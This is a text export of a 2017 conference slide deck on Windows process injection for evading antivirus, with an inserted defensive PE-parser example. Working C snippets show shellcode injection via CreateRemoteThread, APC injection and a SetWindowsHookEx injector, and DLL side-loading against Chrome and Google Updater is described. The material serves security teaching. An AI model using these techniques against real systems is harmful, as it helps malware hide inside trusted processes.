Slide 1

Slide 1 text

Windows Injection 101: from Zero to ROP

Slide 2

Slide 2 text

./Bio✨ • 馬聖豪, aaaddress1 aka adr • Chroot, TDOH • TDOHConf: 2016 agenda lead & 2017 events lead • Proficient in C/C++, Windows internals, reverse engineering • Speaker: HITCON CMT 2015, HITCON CMT 2016 Lightning, SITCON 2016, SITCON 2017, iThome#Chatbot 2017, BSidesLV 2016, ICNC'17, MC2015, CISC 2016, Information Security Fundamentals Workshop, Practical Security Offense & Defense Camp ... r-r-r-roughly, anyway

Slide 3

Slide 3 text

#murmur Some Bullsh*t after I submit this session

Slide 4

Slide 4 text

Slide 5

Slide 5 text

cfp2017.hitcon.org: "6. Prospective speakers must register on the conference submission system (https://cfp2017.hitcon.org) and upload their submission before July 14, 2017, so that the program committee can review it. Submissions are reviewed in order of arrival; once the number of papers needed for this year has been reached, the conference may close submissions early, so please complete the submission process as soon as possible."

Slide 6

Slide 6 text

2017/7/18? https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Slide 7

Slide 7 text

./CoC • Please don't fall asleep during the talk (I'd love to sleep too) • Please raise your hand and speak up (but you promised not to interrupt!) • No smoking, no weed, no 100-metre sprints, no Ouija board, no mahjong, no Ba Jia Jiang dancing, no frying salt-and-pepper chicken, no catching Pokémon behind my back, and don't ask me whether I can freestyle. @Loki the Corgi

Slide 8

Slide 8 text

Evolution of Malware: a long story about how malware fights antivirus

Slide 9

Slide 9 text

R3m0t3-C0ntr0l; H4ck; C&C; B4ckdo0r; Sh311; B0tn3t; K3yl0gger; Ma1ware; Ro0t; W0rm; Zer0-D4y; Trojan; Exp10it; H4ck; $cript; Packet; Cr4ck; R4T; $ecuri7y; vu1ner4bi1i7y; 4dmini$tr4t0r; Byp4$$ing; = Hacker Friendly World

Slide 10

Slide 10 text

until AntiVirus;

Slide 11

Slide 11 text

PE (Portable Executable);

Slide 12

Slide 12 text

Virus Signature;

Slide 13

Slide 13 text

PE (Portable Executable);

Slide 14

Slide 14 text

[Diagram: PE file layout: DOS Header, DOS Program, NT Header (PE signature, File Header, Optional Header), ...]

Slide 15

Slide 15 text

[Diagram: DOS Header, DOS Program, NT Header (PE signature, File Header, Optional Header), ...]
1. The DOS Header starts with 'MZ'.
2. *(DWORD *)(DOS Header + 0x3c) (e_lfanew) points to the NT Header.
The File Header is also referred to as the COFF header. It records NumberOfSections, TimeDateStamp, SizeOfOptionalHeader, etc.

Slide 16

Slide 16 text

Optional Header

typedef struct _IMAGE_OPTIONAL_HEADER {
    WORD  Magic;
    BYTE  MajorLinkerVersion;
    BYTE  MinorLinkerVersion;
    DWORD SizeOfCode;
    DWORD SizeOfInitializedData;
    DWORD SizeOfUninitializedData;
    DWORD AddressOfEntryPoint;
    DWORD BaseOfCode;
    DWORD BaseOfData;
    DWORD ImageBase;
    DWORD SectionAlignment;
    DWORD FileAlignment;
    WORD  MajorOperatingSystemVersion;
    WORD  MinorOperatingSystemVersion;
    WORD  MajorImageVersion;
    WORD  MinorImageVersion;
    WORD  MajorSubsystemVersion;
    WORD  MinorSubsystemVersion;
    DWORD Win32VersionValue;
    DWORD SizeOfImage;
    DWORD SizeOfHeaders;
    DWORD CheckSum;
    WORD  Subsystem;
    WORD  DllCharacteristics;
    DWORD SizeOfStackReserve;
    DWORD SizeOfStackCommit;
    DWORD SizeOfHeapReserve;
    DWORD SizeOfHeapCommit;
    DWORD LoaderFlags;
    DWORD NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

Slide 17

Slide 17 text

[Diagram: DOS Program, NT Header, PE Optional Header, Section Header 1..N (the Section Header Array), Section 1..N] The section header array begins right after the Optional Header; its entries are contiguous, each sizeof(IMAGE_SECTION_HEADER) bytes apart.

Slide 18

Slide 18 text

typedef struct _IMAGE_SECTION_HEADER {
    BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
        DWORD PhysicalAddress;
        DWORD VirtualSize;
    } Misc;
    DWORD VirtualAddress;
    DWORD SizeOfRawData;
    DWORD PointerToRawData;
    DWORD PointerToRelocations;
    DWORD PointerToLinenumbers;
    WORD  NumberOfRelocations;
    WORD  NumberOfLinenumbers;
    DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

[Diagram: DOS Program, NT Header, PE Optional Header, Section Header 1..N, Section 1..N] Each section header points to its section data and records its details, e.g. VirtualAddress, Name, SizeOfRawData.

Slide 19

Slide 19 text

[Diagram: DOS Program, NT Header, PE Optional Header, .text Header, .rdata Header, ..., .text Section, .rdata Section, ..., Section N; the .text section holds:]

void evil() {
    // connect with C&C
    ccLemon();
    // do something evil
    eatYourFood();
}

Each section header points to its section data and records its details, e.g. VirtualAddress, Name, SizeOfRawData.

Slide 20

Slide 20 text

[Diagram: PE: DOS Program, NT Header, ..., .text Section containing the Evil Function at (DOS Header + 0xdead)]

bool chkVirus(PBYTE mem) {
    /* 55                 push ebp
       8b ec              mov  ebp, esp
       81 EC 08 01 00 00  sub  esp, 00000108 */
    char Signature[] = "\x55\x8B\xEC\x81\xEC\x08\x01";
    // memcmp rather than strncmp: a signature may legitimately contain 0x00 bytes
    return !memcmp(mem + 0xdead, Signature, 7);
}

Slide 21

Slide 21 text

So... How about Packer? UPX.exe

Slide 22

Slide 22 text

Real-Time Detection;

Slide 23

Slide 23 text

[Diagram: normal syscall path: Malware.exe (.text) → Kernel32.dll → Ntdll.dll KiFastSystemCall { __asm sysenter } → Windows Kernel (Ring0); eax = function index]

Slide 24

Slide 24 text

[Diagram: ring3 hook: Malware.exe (.text) → sandbox.dll (Hook @ring3) → Ntdll.dll KiFastSystemCall { __asm sysenter } → Windows Kernel (Ring0)]

Slide 25

Slide 25 text

[Diagram: ring0 hook: Malware.exe (.text) → Kernel32.dll → Ntdll.dll KiFastSystemCall { __asm sysenter } → Windows Kernel (Ring0), where the monitor hooks @ring0]

Slide 26

Slide 26 text

[Diagram: Malware Code placed inside the .text section of the Messenger.exe process] Blind spot of anti-virus: place malcode into memory, then get the malcode called.

Slide 27

Slide 27 text

[Diagram: Messenger.exe, carrying the malware code, calls RegOpenKey, DeleteFile and WriteProcessMemory into the Windows Kernel (Ring0) under AV monitoring]

Slide 28

Slide 28 text

Injection Art: Introduction of Injection Tricks

Slide 29

Slide 29 text

Issues of Injection
A. Place code in memory
B. Execution
C. Magic

Slide 30

Slide 30 text

Place code in memory
1. Ntdll.NtWriteVirtualMemory, Kernel32.WriteProcessMemory
2. User32.SetWindowLong
3. AtomBombing
4. Exploit?

Slide 31

Slide 31 text

Execution
1. Ntdll.NtCreateThreadEx, Ntdll.RtlCreateUserThread, Kernel32.CreateRemoteThread
2. Ntdll.NtQueueApcThread, Kernel32.QueueUserAPC
3. Import Address Table Hook
4. SetThreadContext + ResumeThread
5. Extra Window Memory (EWM) Vulnerability
6. Exploit?

Slide 32

Slide 32 text

✨Magic✨
1. Rundll
2. Registry Modification
3. DLL Side-Loading
4. SetWindowsHookEx
5. Shims

Slide 33

Slide 33 text

Injection Art
• Rundll32
• DLL Side-Loading
• CreateRemoteThread
• PE Injection
• Process Hollowing
• SetWindowsHookEx
• Registry Modification
• APC Injection & AtomBombing
• Extra Window Memory (EWM)
• IAT Hooking & Inline Hooking
• Shims

Slide 34

Slide 34 text

Injection Art 0: Baby Steps

Slide 35

Slide 35 text

Rundll: support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface

Slide 36

Slide 36 text

Slide 37

Slide 37 text

Registry Modification
Debugger value (IFEO): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
AppInit_DLLs: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs\

Slide 38

Slide 38 text

Injection Art 1: Typical Code Injection

Slide 39

Slide 39 text

Memory Map (Immunity Debugger)

Slide 40

Slide 40 text

[Diagram: Malware.exe, Messenger.exe and Chrome.exe process layouts, each with Ntdll.dll, Kernel32.dll, User32.dll and Stack Memory; the system DLLs are marked Fixed (same address in every process), the rest ASLR; addresses run from Low to High]

Slide 41

Slide 41 text

[Diagram: Malware.exe and Chrome.exe, each with Ntdll.dll, Kernel32.dll, User32.dll] OpenProcess() returns an access handle to Chrome.exe.

Slide 42

Slide 42 text

[Diagram: same two processes; a new region "Memory Allocated" appears inside Chrome.exe] VirtualAllocEx(): allocate a new space in the target to store the shellcode.

Slide 43

Slide 43 text

[Diagram: the allocated region in Chrome.exe is now labelled Shellcode] WriteProcessMemory(): copy the shellcode into that memory space.

Slide 44

Slide 44 text

[Diagram: a new Thread in Chrome.exe pointing at the Shellcode] CreateRemoteThread(): execute the shellcode.

Slide 45

Slide 45 text

OpenProcess

HANDLE get_process_handle(wchar_t proc_name[]) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 process = { 0 };
    process.dwSize = sizeof(process);
    BOOL found = FALSE;
    if (Process32First(snapshot, &process)) {
        do {
            // compare each running process's image name with the requested one
            if (!wcscmp(process.szExeFile, proc_name)) { found = TRUE; break; }
        } while (Process32Next(snapshot, &process));
    }
    CloseHandle(snapshot);
    // without the flag, a miss would leave the last enumerated process in `process`
    if (!found || !process.th32ProcessID) return NULL;
    return OpenProcess(PROCESS_ALL_ACCESS, 1, process.th32ProcessID);
}

Slide 46

Slide 46 text

HANDLE access_token = get_process_handle(L"chrome.exe");
// strlen(shellcode) + 1 copies the whole buffer; the slide's strlen(shellcode + 1) skipped its first byte
LPVOID mem = VirtualAllocEx(
    access_token, NULL, strlen(shellcode) + 1,
    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
);
WriteProcessMemory(access_token, mem, shellcode, strlen(shellcode) + 1, NULL);
CreateRemoteThread(access_token, NULL, 0, (LPTHREAD_START_ROUTINE)mem, 0, 0, NULL);

Slide 47

Slide 47 text

Injection Art 1.1: Typical Code Injection via APC

Slide 48

Slide 48 text

[Diagram: Malware.exe and Chrome.exe, each with Ntdll.dll, Kernel32.dll, User32.dll] OpenProcess() returns an access handle.

Slide 49

Slide 49 text

[Diagram: "Memory Allocated" inside Chrome.exe] VirtualAllocEx(): allocate a new space to store the shellcode.

Slide 50

Slide 50 text

[Diagram: the allocated region now labelled Shellcode] WriteProcessMemory(): copy the shellcode into that memory space.

Slide 51

Slide 51 text

[Diagram: Chrome.exe holding the Shellcode and threads 1–4] CreateToolhelp32Snapshot(): enumerate threads and map each Thread ID to its process (1 → Chrome.exe, 2 → Chrome.exe, ..., N → XXXX.exe).

Slide 52

Slide 52 text

[Diagram: threads 1–4 of Chrome.exe pointing at the Shellcode] QueueUserAPC(): queue the shellcode as an APC on each of the target's threads.

Slide 53

Slide 53 text

APC Inject

void apc_invoke(DWORD pid, LPVOID mem_func) {
    auto hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te = { sizeof(te) };
    if (Thread32First(hSnapshot, &te)) {
        do {
            // the snapshot is system-wide, so skip threads owned by other processes
            if (te.th32OwnerProcessID != pid) continue;
            HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, te.th32ThreadID);
            if (hThread) {
                QueueUserAPC((PAPCFUNC)mem_func, hThread, NULL);
                CloseHandle(hThread);   // the slide leaked this handle
            }
        } while (::Thread32Next(hSnapshot, &te));
    }
    CloseHandle(hSnapshot);
}

Slide 54

Slide 54 text

Injection Art 2: PE Injection

Slide 55

Slide 55 text

Issues of Code Injection
Hard to develop. Hard to repair. Portability?

char *shellcode = "...";  /* the slide lists roughly 200 bytes of raw x86 shellcode here; the byte string is omitted */

Slide 56

Slide 56 text

[Diagram: Malware.exe and Chrome.exe, each with Ntdll.dll, Kernel32.dll, User32.dll] OpenProcess() returns an access handle.

Slide 57

Slide 57 text

Slide 58

Slide 58 text

[Diagram: PE layout: DOS Program; NtHeader with FileHeader (.NumberOfSections) and OptionalHeader (.ImageBase = 0x400000, .SizeOfHeaders, .AddressOfEntryPoint, .SizeOfImage); Section Header 1 (.text), 2, 3; Section Data 1 (.text) ...] sizeof(Section Header) = IMAGE_SIZEOF_SECTION_HEADER = 40 (fixed)

Slide 59

Slide 59 text

[Diagram: DOS Program; NtHeader; IMAGE_SECTION_HEADER entries 1 (.text), 2, 3 with .VirtualAddress, .PointerToRawData, .SizeOfRawData; Section Data 1 (.text) ...]

SectionHeader[i] = PIMAGE_SECTION_HEADER(
    NtHeader + sizeof(IMAGE_NT_HEADERS) + IMAGE_SIZEOF_SECTION_HEADER * index
);
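The header walk from slides 14–19 and 58–59 ('MZ' at offset 0, e_lfanew at 0x3c, the COFF file header, the PE32 optional header and the 40-byte section header array), as an added example in C that is not code from the deck or from the author's winInject101 repository: it parses a constructed PE32 header held in memory and rejects a section whose PointerToRawData runs past the end of the file, which is the check a scanner needs before trusting a sample's section table. The field offsets are those of the Win32 IMAGE_* structures; SAMPLE_LEN, the -1..-7 result codes and the two-section sample layout are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian field access by byte offset; no windows.h, so this builds on any host. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

#define MAX_SECTIONS 16
typedef struct {
    char     name[9];   /* IMAGE_SECTION_HEADER.Name is 8 bytes and not NUL-terminated */
    uint32_t virtual_address, virtual_size, raw_ptr, raw_size, characteristics;
} pe_section;
typedef struct {
    uint32_t   entry_rva, image_base, size_of_image, size_of_headers;
    uint16_t   num_sections;
    pe_section sec[MAX_SECTIONS];
} pe_info;

/* Walk the headers of a PE32 image in buf[0..len). Returns 0, or a negative code naming the
 * failed check, so "not a PE" (-1/-2) differs from "headers point outside the file" (-6/-7). */
int pe_parse(const uint8_t *buf, size_t len, pe_info *out) {
    memset(out, 0, sizeof(*out));
    if (len < 0x40 || rd16(buf) != 0x5A4D) return -1;                          /* 'MZ' */
    uint32_t nt = rd32(buf + 0x3c);                                             /* e_lfanew -> NT header */
    if (nt > len || len - nt < 24 || rd32(buf + nt) != 0x00004550) return -2;  /* 'PE\0\0' */
    const uint8_t *fh = buf + nt + 4;                                           /* IMAGE_FILE_HEADER (20 bytes) */
    uint16_t nsec = rd16(fh + 2), optsz = rd16(fh + 16);                        /* NumberOfSections, SizeOfOptionalHeader */
    size_t opt_off = (size_t)nt + 24;
    if (optsz < 0x40 || len - opt_off < optsz) return -3;
    const uint8_t *opt = buf + opt_off;
    if (rd16(opt) != 0x10B) return -4;                                          /* Magic: PE32 only, as on the slides */
    out->entry_rva       = rd32(opt + 16);                                      /* AddressOfEntryPoint */
    out->image_base      = rd32(opt + 28);                                      /* ImageBase */
    out->size_of_image   = rd32(opt + 56);                                      /* SizeOfImage */
    out->size_of_headers = rd32(opt + 60);                                      /* SizeOfHeaders */
    /* Section table starts at nt + 4 + 20 + SizeOfOptionalHeader, 40 bytes per entry. Using
     * SizeOfOptionalHeader instead of sizeof(IMAGE_NT_HEADERS) survives non-standard header sizes. */
    size_t sh = opt_off + optsz;
    if (nsec > MAX_SECTIONS || len - sh < (size_t)nsec * 40) return -5;
    for (uint16_t i = 0; i < nsec; i++) {
        const uint8_t *h = buf + sh + (size_t)i * 40;
        pe_section *s = &out->sec[i];
        memcpy(s->name, h, 8); s->name[8] = '\0';
        s->virtual_size    = rd32(h + 8);
        s->virtual_address = rd32(h + 12);
        s->raw_size        = rd32(h + 16);
        s->raw_ptr         = rd32(h + 20);
        s->characteristics = rd32(h + 36);
        /* Raw data must lie inside the file, and the mapped range inside SizeOfImage. */
        if (s->raw_ptr > len || len - s->raw_ptr < s->raw_size) return -6;
        if (s->virtual_address > out->size_of_image ||
            out->size_of_image - s->virtual_address < s->virtual_size) return -7;
    }
    out->num_sections = nsec;
    return 0;
}

/* Constructed sample, not a real binary: minimal PE32 headers with .text (RVA 0x1000) and .rdata (RVA 0x2000). */
#define SAMPLE_LEN 0x400
#define SAMPLE_SH  (0x40 + 24 + 0xE0)                  /* first section header at 0x138 */
size_t build_sample_pe(uint8_t *buf, size_t cap) {
    if (cap < SAMPLE_LEN) return 0;
    memset(buf, 0, SAMPLE_LEN);
    wr16(buf, 0x5A4D); wr32(buf + 0x3c, 0x40);         /* 'MZ', e_lfanew = 0x40 */
    wr32(buf + 0x40, 0x00004550);                       /* 'PE\0\0' */
    wr16(buf + 0x44, 0x014C); wr16(buf + 0x46, 2);      /* Machine = i386, NumberOfSections = 2 */
    wr16(buf + 0x54, 0xE0); wr16(buf + 0x58, 0x10B);    /* SizeOfOptionalHeader, Magic = PE32 */
    wr32(buf + 0x58 + 16, 0x1000); wr32(buf + 0x58 + 28, 0x400000);  /* AddressOfEntryPoint, ImageBase */
    wr32(buf + 0x58 + 56, 0x3000); wr32(buf + 0x58 + 60, 0x200);     /* SizeOfImage, SizeOfHeaders */
    const char *names[2] = { ".text", ".rdata" };
    for (int i = 0; i < 2; i++) {
        uint8_t *h = buf + SAMPLE_SH + i * 40;
        memcpy(h, names[i], strlen(names[i]));
        wr32(h + 8, 0x100); wr32(h + 12, 0x1000u * (i + 1));        /* VirtualSize, VirtualAddress */
        wr32(h + 16, 0x100); wr32(h + 20, 0x200 + 0x100u * i);      /* SizeOfRawData, PointerToRawData */
        wr32(h + 36, i == 0 ? 0x60000020u : 0x40000040u);          /* CODE|EXECUTE|READ, IDATA|READ */
    }
    return SAMPLE_LEN;
}

/* Builds the sample, optionally points .text's PointerToRawData past EOF (as a truncated or crafted sample would), and parses it. */
int sample_verdict(int tamper, pe_info *out) {
    uint8_t img[SAMPLE_LEN];
    size_t n = build_sample_pe(img, sizeof img);
    if (tamper) wr32(img + SAMPLE_SH + 20, 0x1000);
    return pe_parse(img, n, out);
}

int main(void) {
    pe_info pe;
    int rc = sample_verdict(0, &pe);
    printf("clean sample: rc=%d sections=%u entry=0x%x base=0x%x\n", rc, pe.num_sections, pe.entry_rva, pe.image_base);
    printf("tampered sample: rc=%d (raw data outside the file)\n", sample_verdict(1, &pe));
    return 0;
}
```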

Slide 60

Slide 60 text

[Diagram: Malware.exe and the Chrome process] VirtualAllocEx(): allocate memory in the target at ImageBase (0x400000), length = SizeOfImage.

Slide 61

Slide 61 text

[Diagram: the Image Header now inside the Chrome process] WriteProcessMemory() at ImageBase + 0x00: copy SizeOfHeaders bytes from (malware.exe + 0x00), i.e. the image header.

Slide 62

Slide 62 text

[Diagram: malware.exe's NtHeader, Section Header 1 (.VirtualAddress = 0xbeef, .PointerToRawData, .SizeOfRawData) and Section Data 1; the Chrome process with the Image Header and Space@beef] Copy SizeOfRawData bytes from PointerToRawData to ImageBase + 0xbeef via WriteProcessMemory().

Slide 63

Slide 63 text

[Diagram: malware.exe's Section Header 2 (.VirtualAddress = 0xcafe, .PointerToRawData, .SizeOfRawData) and Section Data 2; the Chrome process with the Image Header, Space@beef and Space@cafe] Copy SizeOfRawData bytes from PointerToRawData to ImageBase + 0xcafe via WriteProcessMemory().

Slide 64

Slide 64 text

[Diagram: the Chrome process now holds Malware.exe's Image Header, .text, Section 2, Section 3 ...] SetThreadContext() & ResumeThread() with eax = AddressOfEntryPoint.

Slide 65

Slide 65 text

Slide 66

Slide 66 text

Slide 67

Slide 67 text

Injection Art 3: DLL Injection

Slide 68

Slide 68 text

[Diagram: Program.exe with Ntdll.dll, Kernel32.dll, User32.dll] Program.exe calls LoadLibraryA("junk.dll").

Slide 69

Slide 69 text

[Diagram: Junk.dll (.text Section) now mapped into Program.exe after LoadLibraryA("junk.dll")]

Slide 70

Slide 70 text

[Diagram: the loader entering Junk.dll's .text section] The loader invokes DllMain() or DllEntry().

Slide 71

Slide 71 text

[Diagram: Malware.exe and Chrome.exe, each with Ntdll.dll, Kernel32.dll, User32.dll] OpenProcess() returns an access handle.

Slide 72

Slide 72 text

[Diagram: "Memory Allocated" inside the Chrome process] VirtualAllocEx(): allocate memory in the target to store the DLL path.

Slide 73

Slide 73 text

[Diagram: the allocated region now reads C:\hola.dll] WriteProcessMemory(): copy the DLL path into that memory space.

Slide 74

Slide 74 text

[Diagram: Kernel32.dll marked Fixed, i.e. mapped at the same address in Malware.exe and in the Chrome process]

Slide 75

Slide 75 text

[Diagram: same two processes] GetProcAddress(LoadLibrary("kernel32.dll"), "LoadLibraryA");

Slide 76

Slide 76 text

[Diagram: same two processes] CreateRemoteThread with LoadLibraryA as the start routine and the written path (C:\hola.dll) as its parameter.

Slide 77

Slide 77 text

Slide 78

Slide 78 text

Injection Art 4: DLL Side-Loading

Slide 79

Slide 79 text

news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml

Slide 80

Slide 80 text

DLL Hijacking Issue: news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml

Slide 81

Slide 81 text

Google Chrome

Slide 82

Slide 82 text

Google Updater

Slide 83

Slide 83 text

Google Updater

Slide 84

Slide 84 text

int __fastcall sub_2F64CA(HMODULE hModule, char ch) {
    /* ... */
    if ( GetModuleFileNameW(hModule, &Filename, 0x104u)
      && ( PathRemoveFileSpecW(&Filename),
           memcpy(&pszPath, &Filename, 260),
           PathAppendW(&pszPath, L"goopdate.dll") ) ) {
        if (sub_2F6211(&pszPath)) {
            // make v4 point to goopdate.dll
            sub_2F68D4(&pszPath, sub_2FAB00(&pszPath));
            result = 0;
        }
        /* ... */
    }

Slide 85

Slide 85 text

Google Updater

Slide 86

Slide 86 text

[Diagram: the GoogleUpdate process with Ntdll.dll, Kernel32.dll, User32.dll] GoogleUpdate calls LoadLibraryA("goopdate.dll").

Slide 87

Slide 87 text

[Diagram: goopdate.dll (.text Section) mapped into the GoogleUpdate process after LoadLibraryA("goopdate.dll")]

Slide 88

Slide 88 text

[Diagram: the loader entering goopdate.dll's .text section] The loader invokes DllEntry().

Slide 89

Slide 89 text

Slide 90

Slide 90 text

✨Magic✨ DLL Side-Loading & Advanced Techniques

Slide 91

Slide 91 text

Issues of Windows API

Slide 92

Slide 92 text

GetICMProfile

Slide 93

Slide 93 text

Logic of Chrome after loading pages

Slide 94

Slide 94 text

The logic in WinAPI: GetICMProfile (Initialization)

Slide 95

Slide 95 text

IcmInitialize()

Slide 96

Slide 96 text

OllyDbg: Chrome

Slide 97

Slide 97 text

How LoadLibrary() Works

Slide 98

Slide 98 text

KernelBase.dll

Slide 99

Slide 99 text

BaseGetProcessDllPath
{CURRENT_PATH};
C:\Windows\system32;
C:\Windows\system;
C:\Windows;
.;
C:\Program Files\Windows C:\Windows\System32\WindowsPowerShell\v1.0\;
...

Slide 100

Slide 100 text

A for loop tries to find the DLL in each system/environment directory in turn.

Slide 101

Slide 101 text

[Diagram: Chrome.exe with Ntdll.dll, Kernel32.dll and GDI32.dll (GetICMProfile)]

Slide 102

Slide 102 text

[Diagram: same] Chrome.exe calls GDI32!GetICMProfile().

Slide 103

Slide 103 text

[Diagram: same] Inside GetICMProfile(): LoadLibraryW("mscms.dll");

Slide 104

Slide 104 text

[Diagram: same] GetICMProfile() → Kernel32!LoadLibraryW("mscms.dll");

Slide 105

Slide 105 text

[Diagram: same] LoadLibraryW("mscms.dll") searches, in order: ...\Chrome\Application; C:\Windows\system32; C:\Windows\system; C:\Windows; ...

Slide 106

Slide 106 text

[Diagram: same] Candidate paths tried in order: ...\Chrome\Application\mscms.dll; C:\Windows\system32\mscms.dll; C:\Windows\system\mscms.dll; C:\Windows\mscms.dll; ... → mscms.dll

Slide 107

Slide 107 text

Chrome Latest Version 60.0.3112.101

Slide 108

Slide 108 text

Chrome Latest Version 60.0.3112.101

Slide 109

Slide 109 text

Visual Style UI Rendering (Issues of UxTheme.dll)

Slide 110

Slide 110 text

HexEdit & WinSpy

Slide 111

Slide 111 text

HexEdit: cls_Forms_TCustomDockForm, Forms::TCustomDockForm::Loaded(void)

Slide 112

Slide 112 text

Dwmapi::DwmExtendFrameIntoClientArea

Slide 113

Slide 113 text

UI Visual Style Issue

Slide 114

Slide 114 text

UxTheme::SetWindowTheme

Slide 115

Slide 115 text

UxTheme::IsCompositionActive calls dwmapi::DwmIsCompositionEnabled

Slide 116

Slide 116 text

UxTheme::IsCompositionActive calls dwmapi::DwmIsCompositionEnabled

Slide 117

Slide 117 text

It allows us to hijack Visual Style UI programs:
• HexEdit
• 7Zip
• WinSpy
• LoLTWLauncher
• .NET programs
• Borland C++ programs

Slide 118

Slide 118 text

Injection Art 5: SetWindowsHookEx

Slide 119

Slide 119 text

SetWindowsHookEx

HHOOK WINAPI SetWindowsHookEx(
    _In_ int       idHook,      /* hook type */
    _In_ HOOKPROC  lpfn,        /* hook function */
    _In_ HINSTANCE hMod,        /* module containing it */
    _In_ DWORD     dwThreadId   /* thread id */
);

Slide 120

Slide 120 text

SetWindowsHookEx hook types (idHook):
 -1  WH_MSGFILTER
  0  WH_JOURNALRECORD
  1  WH_JOURNALPLAYBACK
  2  WH_KEYBOARD
  3  WH_GETMESSAGE
  4  WH_CALLWNDPROC
  5  WH_CBT
  6  WH_SYSMSGFILTER
  7  WH_MOUSE
  9  WH_DEBUG
 10  WH_SHELL
 11  WH_FOREGROUNDIDLE
 12  WH_CALLWNDPROCRET
 13  WH_KEYBOARD_LL
 14  WH_MOUSE_LL

Slide 121

Slide 121 text

Codes of Inject.dll

static HHOOK   hHook = NULL;
static HMODULE hMod  = NULL;   // this DLL's own module handle (set from DllMain's HINSTANCE)
static bool    disp  = false;  // show the message box only once per process

LRESULT WINAPI msgProg(int code, WPARAM wParam, LPARAM lParam) {
    if (!disp) MessageBoxA(0, "Hello World", "HITCON 2017", 0);
    disp = true;
    return CallNextHookEx(NULL, code, wParam, lParam);
}

extern "C" {
    __declspec(dllexport) int hookStart() {
        hHook = SetWindowsHookEx(WH_GETMESSAGE, msgProg, hMod, 0);
        return !!hHook;
    }
    __declspec(dllexport) int hookStop() {
        return hHook && UnhookWindowsHookEx(hHook);
    }
}

Slide 122

Slide 122 text

Codes of Injector.exe

int main() {
    if (auto mod = LoadLibraryA("inject.dll")) {
        // reuse the module handle instead of calling LoadLibraryA a second time
        ((int(*)())GetProcAddress(mod, "hookStart"))();
        getchar();
    }
    return 0;
}

Slide 123

Slide 123 text

DLL Inject

Slide 124

Slide 124 text

Slide 125

Slide 125 text

Injection Art 7: AtomBombing

Slide 126

Slide 126 text

https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows

Slide 127

Slide 127 text

GlobalAddAtom

Slide 128

Slide 128 text

GlobalGetAtomName

Slide 129

Slide 129 text

NtQueueApcThread

NTSTATUS NtQueueApcThread(
    HANDLE           ThreadHandle,
    PKNORMAL_ROUTINE ApcRoutine,
    PVOID            ApcContext,
    PVOID            Argument1,
    PVOID            Argument2
);

NtQueueApcThread:
    mov  eax, 10Dh            ; NtQueueApcThread
    mov  edx, 7FFE0300h
    call dword ptr [edx]      ; KiFastSystemCall
    retn 14h

Slide 130

Slide 130 text

[Diagram: "Memory Allocated" inside Chrome.exe] VirtualAllocEx(): allocate a new space to store the shellcode.

Slide 131

Slide 131 text

[Diagram: Chrome.exe holding the Shellcode and threads 1–4] CreateToolhelp32Snapshot(): enumerate threads and map each Thread ID to its process (1 → Chrome.exe, 2 → Chrome.exe, ..., N → XXXX.exe).

Slide 132

Slide 132 text

[Diagram: Chrome.exe's threads 1–4; NtQueueApcThread() queues GlobalGetAtomNameW, which copies the atom (Shellcode) into the target's memory]

Slide 133

Slide 133 text

[Diagram: Chrome.exe's threads 1–4 pointing at the copied Shellcode] NtQueueApcThread(): queue the shellcode itself on the target's threads.

Slide 134

Slide 134 text

Injection Art 8: Extra Window Memory Vulnerability

Slide 135

Slide 135 text

Shell_TrayWnd

Slide 136

Slide 136 text

int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) {
    /* Initialization for Window */
    if (!*lParam)
        return 0;
    else if (Msg == WM_NCCREATE) {
        *(*lParam + 4) = hWnd;
        SetWindowLongW(hWnd, 0, *lParam);
        /* Custom WndProc */
        return (void(*)())(*lParam + 8)(*lParam, hWnd, WM_NCCREATE, wParam, lParam);
    }
    /* ... Deal with normal Window Event ... */
}

Slide 137

Slide 137 text

int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) {
    /* ... Initialization for Window ... */
    /* Deal with normal Window Event */
    DWORD wndSelf = GetWindowLongW(hWnd, 0);
    DWORD lParama;
    if (wndSelf) {
        /* InterlockedIncrement */
        (void(*)())*wndSelf(wndSelf);
        /* Custom WndProc */
        lParama = (*wndSelf + 0x08)(wndSelf, hWnd, Msg, wParam, lParam);
        if (Msg == WM_NCDESTROY) {
            SetWindowLongW(hWnd, 0, 0);
            *(wndSelf + 0x04) = 0;
        }
        /* Destroy Task */
        (void(*)())(*wndSelf + 0x04)(wndSelf);
    } else
        lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam);
    return lParama;
}

Slide 138

Slide 138 text


Slide 139

Slide 139 text

[Diagram: Malware.exe; Explorer.exe owning the Shell_TrayWnd window, whose extra window memory (Window Class) holds +0 lParam (vtable) and +4 hWnd]

Slide 140

Slide 140 text

